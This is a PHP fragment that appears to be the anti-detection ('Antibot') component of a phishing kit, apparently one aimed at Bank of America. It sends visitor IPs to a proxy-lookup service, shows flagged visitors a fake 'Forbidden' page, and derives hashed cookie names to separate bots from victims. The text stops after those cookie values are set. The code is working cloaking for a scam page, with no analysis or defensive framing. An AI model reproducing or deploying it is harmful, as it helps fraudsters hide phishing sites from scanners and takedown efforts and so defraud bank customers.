<?php 
$tanitatikaram = parse_ini_file("Anticonfig.ini", true);
$setting_proxy = $tanitatikaram['Proxy'];
$ip = getenv("REMOTE_ADDR");
if ($setting_proxy == 'on') {
if($ip == "127.0.0.1") {
}else{
$url = "https://blackbox.ipinfo.app/lookup/".$ip;
$ch = curl_init();  
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$resp = curl_exec($ch);
curl_close($ch);
$result = $resp;
if($result == "Y") {
header('Location: Antibot/proxy.php');
die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>Antibot Forbidden</title></head><body><h1>Forbidden</h1><p>You dont have permission to access / on this server.</p></body></html>');
exit();
    }
}}
$scamanamevsowner="boa".$_SERVER['HTTP_HOST'];
$timecookie=strtolower(sha1(md5('5075140835d0bc504791c76b04c33d2bck'.'time'.$scamanamevsowner)));
$bottime=strtolower(sha1(md5('ce114cdc5e387191210f3b519dfb118bck'.'botkiller'.$scamanamevsowner)));
$timecookievalue=strtolower(sha1(md5('c327b49efdca2668f28cd7b4beee54b3y3r'.'value'.$scamanamevsowner)));

